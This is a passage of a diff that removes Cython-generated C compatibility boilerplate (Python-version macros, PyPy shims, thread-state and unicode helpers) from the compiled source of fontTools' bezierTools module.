code, c, n, v, fv, cell, fn, name, name, fline, lnos, empty_bytes); - Py_DECREF(empty_bytes); - return result; - } -#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#else - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#endif -#endif -#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) - #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) -#else - #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) - #define __Pyx_Py_Is(x, y) Py_Is(x, y) -#else - #define __Pyx_Py_Is(x, y) ((x) == (y)) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) - #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) -#else - #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) - #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) -#else - #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) - #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) -#else - #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) -#endif -#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) -#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) -#else - #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) -#endif -#ifndef CO_COROUTINE - #define CO_COROUTINE 0x80 -#endif -#ifndef CO_ASYNC_GENERATOR - #define CO_ASYNC_GENERATOR 0x200 -#endif -#ifndef Py_TPFLAGS_CHECKTYPES - #define Py_TPFLAGS_CHECKTYPES 0 -#endif -#ifndef Py_TPFLAGS_HAVE_INDEX - #define Py_TPFLAGS_HAVE_INDEX 0 -#endif -#ifndef Py_TPFLAGS_HAVE_NEWBUFFER - #define Py_TPFLAGS_HAVE_NEWBUFFER 0 -#endif -#ifndef Py_TPFLAGS_HAVE_FINALIZE - #define Py_TPFLAGS_HAVE_FINALIZE 0 -#endif -#ifndef Py_TPFLAGS_SEQUENCE - #define Py_TPFLAGS_SEQUENCE 0 -#endif -#ifndef Py_TPFLAGS_MAPPING - #define Py_TPFLAGS_MAPPING 0 -#endif -#ifndef METH_STACKLESS - #define METH_STACKLESS 0 -#endif -#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) - #ifndef METH_FASTCALL - #define METH_FASTCALL 0x80 - #endif - typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); - typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, - Py_ssize_t nargs, PyObject *kwnames); -#else - #define __Pyx_PyCFunctionFast _PyCFunctionFast - #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords -#endif -#if CYTHON_METH_FASTCALL - #define __Pyx_METH_FASTCALL METH_FASTCALL - #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast - #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords -#else - #define __Pyx_METH_FASTCALL METH_VARARGS - #define __Pyx_PyCFunction_FastCall PyCFunction - #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords -#endif -#if CYTHON_VECTORCALL - #define __pyx_vectorcallfunc vectorcallfunc - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET - #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) -#elif CYTHON_BACKPORT_VECTORCALL - typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, - size_t nargsf, PyObject *kwnames); - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) - #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) -#else - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 - #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) -#endif -#if PY_MAJOR_VERSION >= 0x030900B1 -#define __Pyx_PyCFunction_CheckExact(func) PyCFunction_CheckExact(func) -#else -#define __Pyx_PyCFunction_CheckExact(func) PyCFunction_Check(func) -#endif -#define __Pyx_CyOrPyCFunction_Check(func) PyCFunction_Check(func) -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_CyOrPyCFunction_GET_FUNCTION(func) (((PyCFunctionObject*)(func))->m_ml->ml_meth) -#elif !CYTHON_COMPILING_IN_LIMITED_API -#define __Pyx_CyOrPyCFunction_GET_FUNCTION(func) PyCFunction_GET_FUNCTION(func) -#endif -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_CyOrPyCFunction_GET_FLAGS(func) (((PyCFunctionObject*)(func))->m_ml->ml_flags) -static CYTHON_INLINE PyObject* __Pyx_CyOrPyCFunction_GET_SELF(PyObject *func) { - return (__Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_STATIC) ? NULL : ((PyCFunctionObject*)func)->m_self; -} -#endif -static CYTHON_INLINE int __Pyx__IsSameCFunction(PyObject *func, void *cfunc) { -#if CYTHON_COMPILING_IN_LIMITED_API - return PyCFunction_Check(func) && PyCFunction_GetFunction(func) == (PyCFunction) cfunc; -#else - return PyCFunction_Check(func) && PyCFunction_GET_FUNCTION(func) == (PyCFunction) cfunc; -#endif -} -#define __Pyx_IsSameCFunction(func, cfunc) __Pyx__IsSameCFunction(func, cfunc) -#if __PYX_LIMITED_VERSION_HEX < 0x030900B1 - #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) - typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); -#else - #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) - #define __Pyx_PyCMethod PyCMethod -#endif -#ifndef METH_METHOD - #define METH_METHOD 0x200 -#endif -#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) - #define PyObject_Malloc(s) PyMem_Malloc(s) - #define PyObject_Free(p) PyMem_Free(p) - #define PyObject_Realloc(p) PyMem_Realloc(p) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) - #define __Pyx_PyFrame_SetLineNumber(frame, lineno) -#else - #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) - #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyThreadState_Current PyThreadState_Get() -#elif !CYTHON_FAST_THREAD_STATE - #define __Pyx_PyThreadState_Current PyThreadState_GET() -#elif PY_VERSION_HEX >= 0x03060000 - #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() -#elif PY_VERSION_HEX >= 0x03000000 - #define __Pyx_PyThreadState_Current PyThreadState_GET() -#else - #define __Pyx_PyThreadState_Current _PyThreadState_Current -#endif -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) -{ - void *result; - result = PyModule_GetState(op); - if (!result) - Py_FatalError("Couldn't find the module state"); - return result; -} -#endif -#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) -#else - #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) -#endif -#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) -#include "pythread.h" -#define Py_tss_NEEDS_INIT 0 -typedef int Py_tss_t; -static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { - *key = PyThread_create_key(); - return 0; -} -static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { - Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); - *key = Py_tss_NEEDS_INIT; - return key; -} -static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { - PyObject_Free(key); -} -static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { - return *key != Py_tss_NEEDS_INIT; -} -static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { - PyThread_delete_key(*key); - *key = Py_tss_NEEDS_INIT; -} -static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { - return PyThread_set_key_value(*key, value); -} -static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { - return PyThread_get_key_value(*key); -} -#endif -#if PY_MAJOR_VERSION < 3 - #if CYTHON_COMPILING_IN_PYPY - #if PYPY_VERSION_NUM < 0x07030600 - #if defined(__cplusplus) && __cplusplus >= 201402L - [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] - #elif defined(__GNUC__) || defined(__clang__) - __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) - #elif defined(_MSC_VER) - __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) - #endif - static CYTHON_INLINE int PyGILState_Check(void) { - return 0; - } - #else // PYPY_VERSION_NUM < 0x07030600 - #endif // PYPY_VERSION_NUM < 0x07030600 - #else - static CYTHON_INLINE int PyGILState_Check(void) { - PyThreadState * tstate = _PyThreadState_Current; - return tstate && (tstate == PyGILState_GetThisThreadState()); - } - #endif -#endif -#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) -#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) -#else -#define __Pyx_PyDict_NewPresized(n) PyDict_New() -#endif -#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION - #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) - #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) -#else - #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) - #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) -#endif -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS -#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) -static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { - PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); - if (res == NULL) PyErr_Clear(); - return res; -} -#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) -#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError -#define __Pyx_PyDict_GetItemStr PyDict_GetItem -#else -static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { -#if CYTHON_COMPILING_IN_PYPY - return PyDict_GetItem(dict, name); -#else - PyDictEntry *ep; - PyDictObject *mp = (PyDictObject*) dict; - long hash = ((PyStringObject *) name)->ob_shash; - assert(hash != -1); - ep = (mp->ma_lookup)(mp, name, hash); - if (ep == NULL) { - return NULL; - } - return ep->me_value; -#endif -} -#define __Pyx_PyDict_GetItemStr PyDict_GetItem -#endif -#if CYTHON_USE_TYPE_SLOTS - #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) - #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) - #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) -#else - #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) - #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) - #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_SetItemOnTypeDict(tp, k, v) PyObject_GenericSetAttr((PyObject*)tp, k, v) -#else - #define __Pyx_SetItemOnTypeDict(tp, k, v) PyDict_SetItem(tp->tp_dict, k, v) -#endif -#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 -#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ - PyTypeObject *type = Py_TYPE(obj);\ - assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ - PyObject_GC_Del(obj);\ - Py_DECREF(type);\ -} -#else -#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define CYTHON_PEP393_ENABLED 1 - #define __Pyx_PyUnicode_READY(op) (0) - #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) - #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) - #define __Pyx_PyUnicode_DATA(u) ((void*)u) - #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) -#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) - #define CYTHON_PEP393_ENABLED 1 - #if PY_VERSION_HEX >= 0x030C0000 - #define __Pyx_PyUnicode_READY(op) (0) - #else - #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ - 0 : _PyUnicode_Ready((PyObject *)(op))) - #endif - #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) - #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) - #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) - #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) - #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) - #if PY_VERSION_HEX >= 0x030C0000 - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) - #else - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) - #else - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) - #endif - #endif -#else - #define CYTHON_PEP393_ENABLED 0 - #define PyUnicode_1BYTE_KIND 1 - #define PyUnicode_2BYTE_KIND 2 - #define PyUnicode_4BYTE_KIND 4 - #define __Pyx_PyUnicode_READY(op) (0) - #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) - #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) - #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) - #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) - #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) -#endif -#if CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) - #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) -#else - #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) - #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ - PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) -#endif -#if CYTHON_COMPILING_IN_PYPY - #if !defined(PyUnicode_DecodeUnicodeEscape) - #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) - #endif - #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) - #undef PyUnicode_Contains - #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) - #endif - #if !defined(PyByteArray_Check) - #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) - #endif - #if !defined(PyObject_Format) - #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) - #endif -#endif -#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) -#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) -#if PY_MAJOR_VERSION >= 3 - #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) -#else - #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) -#endif -#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) - #define PyObject_ASCII(o) PyObject_Repr(o) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyBaseString_Type PyUnicode_Type - #define PyStringObject PyUnicodeObject - #define PyString_Type PyUnicode_Type - #define PyString_Check PyUnicode_Check - #define PyString_CheckExact PyUnicode_CheckExact -#ifndef PyObject_Unicode - #define PyObject_Unicode PyObject_Str -#endif -#endif -#if PY_MAJOR_VERSION >= 3 - #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) - #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) -#else - #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) - #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) -#endif -#if CYTHON_COMPILING_IN_CPYTHON - #define __Pyx_PySequence_ListKeepNew(obj)\ - (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) -#else - #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) -#endif -#ifndef PySet_CheckExact - #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) -#endif -#if PY_VERSION_HEX >= 0x030900A4 - #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) - #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) -#else - #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) - #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) -#endif -#if CYTHON_ASSUME_SAFE_MACROS - #define __Pyx_PySequence_ITEM(o, i) PySequence_ITEM(o, i) - #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) - #define __Pyx_PyTuple_SET_ITEM(o, i, v) (PyTuple_SET_ITEM(o, i, v), (0)) - #define __Pyx_PyList_SET_ITEM(o, i, v) (PyList_SET_ITEM(o, i, v), (0)) - #define __Pyx_PyTuple_GET_SIZE(o) PyTuple_GET_SIZE(o) - #define __Pyx_PyList_GET_SIZE(o) PyList_GET_SIZE(o) - #define __Pyx_PySet_GET_SIZE(o) PySet_GET_SIZE(o) - #define __Pyx_PyBytes_GET_SIZE(o) PyBytes_GET_SIZE(o) - #define __Pyx_PyByteArray_GET_SIZE(o) PyByteArray_GET_SIZE(o) -#else - #define __Pyx_PySequence_ITEM(o, i) PySequence_GetItem(o, i) - #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) - #define __Pyx_PyTuple_SET_ITEM(o, i, v) PyTuple_SetItem(o, i, v) - #define __Pyx_PyList_SET_ITEM(o, i, v) PyList_SetItem(o, i, v) - #define __Pyx_PyTuple_GET_SIZE(o) PyTuple_Size(o) - #define __Pyx_PyList_GET_SIZE(o) PyList_Size(o) - #define __Pyx_PySet_GET_SIZE(o) PySet_Size(o) - #define __Pyx_PyBytes_GET_SIZE(o) PyBytes_Size(o) - #define __Pyx_PyByteArray_GET_SIZE(o) PyByteArray_Size(o) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyIntObject PyLongObject - #define PyInt_Type PyLong_Type - #define PyInt_Check(op) PyLong_Check(op) - #define PyInt_CheckExact(op) PyLong_CheckExact(op) - #define __Pyx_Py3Int_Check(op) PyLong_Check(op) - #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) - #define PyInt_FromString PyLong_FromString - #define PyInt_FromUnicode PyLong_FromUnicode - #define PyInt_FromLong PyLong_FromLong - #define PyInt_FromSize_t PyLong_FromSize_t - #define PyInt_FromSsize_t PyLong_FromSsize_t - #define PyInt_AsLong PyLong_AsLong - #define PyInt_AS_LONG PyLong_AS_LONG - #define PyInt_AsSsize_t PyLong_AsSsize_t - #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask - #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask - #define PyNumber_Int PyNumber_Long -#else - #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) - #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) -#endif -#if PY_MAJOR_VERSION >= 3 - #define PyBoolObject PyLongObject -#endif -#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY - #ifndef PyUnicode_InternFromString - #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) - #endif -#endif -#if PY_VERSION_HEX < 0x030200A4 - typedef long Py_hash_t; - #define __Pyx_PyInt_FromHash_t PyInt_FromLong - #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t -#else - #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t - #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t -#endif -#if CYTHON_USE_ASYNC_SLOTS - #if PY_VERSION_HEX >= 0x030500B1 - #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods - #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) - #else - #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) - #endif -#else - #define __Pyx_PyType_AsAsync(obj) NULL -#endif -#ifndef __Pyx_PyAsyncMethodsStruct - typedef struct { - unaryfunc am_await; - unaryfunc am_aiter; - unaryfunc am_anext; - } __Pyx_PyAsyncMethodsStruct; -#endif - -#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) - #if !defined(_USE_MATH_DEFINES) - #define _USE_MATH_DEFINES - #endif -#endif -#include -#ifdef NAN -#define __PYX_NAN() ((float) NAN) -#else -static CYTHON_INLINE float __PYX_NAN() { - float value; - memset(&value, 0xFF, sizeof(value)); - return value; -} -#endif -#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) -#define __Pyx_truncl trunc -#else -#define __Pyx_truncl truncl -#endif - -#define __PYX_MARK_ERR_POS(f_index, lineno) \ - { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } -#define __PYX_ERR(f_index, lineno, Ln_error) \ - { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } - -#ifdef CYTHON_EXTERN_C - #undef __PYX_EXTERN_C - #define __PYX_EXTERN_C CYTHON_EXTERN_C -#elif defined(__PYX_EXTERN_C) - #ifdef _MSC_VER - #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") - #else - #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. - #endif -#else - #ifdef __cplusplus - #define __PYX_EXTERN_C extern "C" - #else - #define __PYX_EXTERN_C extern - #endif -#endif - -#define __PYX_HAVE__fontTools__misc__bezierTools -#define __PYX_HAVE_API__fontTools__misc__bezierTools -/* Early includes */ -#ifdef _OPENMP -#include -#endif /* _OPENMP */ - -#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) -#define CYTHON_WITHOUT_ASSERTIONS -#endif - -typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; - const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; - -#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 -#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 -#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) -#define __PYX_DEFAULT_STRING_ENCODING "" -#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString -#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize -#define __Pyx_uchar_cast(c) ((unsigned char)c) -#define __Pyx_long_cast(x) ((long)x) -#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ - (sizeof(type) < sizeof(Py_ssize_t)) ||\ - (sizeof(type) > sizeof(Py_ssize_t) &&\ - likely(v < (type)PY_SSIZE_T_MAX ||\ - v == (type)PY_SSIZE_T_MAX) &&\ - (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ - v == (type)PY_SSIZE_T_MIN))) ||\ - (sizeof(type) == sizeof(Py_ssize_t) &&\ - (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ - v == (type)PY_SSIZE_T_MAX))) ) -static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { - return (size_t) i < (size_t) limit; -} -#if defined (__cplusplus) && __cplusplus >= 201103L - #include - #define __Pyx_sst_abs(value) std::abs(value) -#elif SIZEOF_INT >= SIZEOF_SIZE_T - #define __Pyx_sst_abs(value) abs(value) -#elif SIZEOF_LONG >= SIZEOF_SIZE_T - #define __Pyx_sst_abs(value) labs(value) -#elif defined (_MSC_VER) - #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) -#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define __Pyx_sst_abs(value) llabs(value) -#elif defined (__GNUC__) - #define __Pyx_sst_abs(value) __builtin_llabs(value) -#else - #define __Pyx_sst_abs(value) ((value<0) ? -value : value) -#endif -static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); -static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); -static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); -static CYTHON_INLINE PyObject* __Pyx_PyByteArray_FromString(const char*); -#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) -#define __Pyx_PyBytes_FromString PyBytes_FromString -#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize -static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); -#if PY_MAJOR_VERSION < 3 - #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString - #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize -#else - #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString - #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize -#endif -#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) 